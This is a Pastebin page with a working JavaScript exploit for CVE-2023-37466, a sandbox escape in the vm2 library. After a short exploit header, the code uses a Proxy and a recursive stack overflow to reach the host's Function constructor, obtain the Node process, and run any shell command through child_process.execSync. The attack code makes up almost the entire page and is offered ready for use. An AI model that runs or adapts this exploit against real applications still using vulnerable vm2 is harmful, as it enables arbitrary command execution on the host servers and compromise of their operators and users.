Advertisement
FlyFar

vm2 Sandbox Escape Vulnerability - CVE-2023-37466

Mar 21st, 2024
3,556
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 1.03 KB | Cybersecurity | 0 0
  1. /*
  2. # Exploit Title: vm2 Sandbox Escape vulnerability
  3. # Date: 23/12/2023
  4. # Exploit Author: Calil Khalil & Adriel Mc Roberts
  5. # Vendor Homepage: https://github.com/patriksimek/vm2
  6. # Software Link: https://github.com/patriksimek/vm2
  7. # Version: vm2 <= 3.9.19
  8. # Tested on: Ubuntu 22.04
  9. # CVE : CVE-2023-37466
  10. */
  11.  
  12. const { VM } = require("vm2");
  13. const vm = new VM();
  14.  
  15. const command = 'pwd'; // Change to the desired command
  16.  
  17. const code = `
  18. async function fn() {
  19.     (function stack() {
  20.         new Error().stack;
  21.         stack();
  22.     })();
  23. }
  24.  
  25. try {
  26.     const handler = {
  27.         getPrototypeOf(target) {
  28.             (function stack() {
  29.                 new Error().stack;
  30.                 stack();
  31.             })();
  32.         }
  33.     };
  34.  
  35.     const proxiedErr = new Proxy({}, handler);
  36.  
  37.     throw proxiedErr;
  38. } catch ({ constructor: c }) {
  39.     const childProcess = c.constructor('return process')().mainModule.require('child_process');
  40.     childProcess.execSync('${command}');
  41. }
  42. `;
  43.  
  44. console.log(vm.run(code));
  45.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement